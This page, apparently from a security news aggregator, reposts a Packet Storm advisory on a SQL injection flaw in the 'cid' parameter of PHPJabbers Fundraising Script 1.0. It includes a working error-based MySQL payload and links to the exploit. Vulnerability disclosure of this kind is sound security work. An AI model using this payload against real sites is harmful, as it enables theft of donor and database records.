Security
Headlines
HeadlinesLatestCVEs

Headline

Fundraising Script 1.0 SQL Injection

Fundraising Script version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#web#git#php#auth
## Title: Fundraising Script-1.0 SQLi## Author: nu11secur1ty## Date: 09/13/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `cid` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the cid parameter, and a database errormessage was returned.The database is empty, but if it is not, this will be over for themoney of the donors and their bank accounts!The attacker can steal all information from the database!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: cid (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT(ELT(1741=1741,1))),0x7162787171),3873))---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/fundraising-script-10-sqli.html)## Time spent:01:15:00

Packet Storm: Latest News

WordPress Really Simple Security Authentication Bypass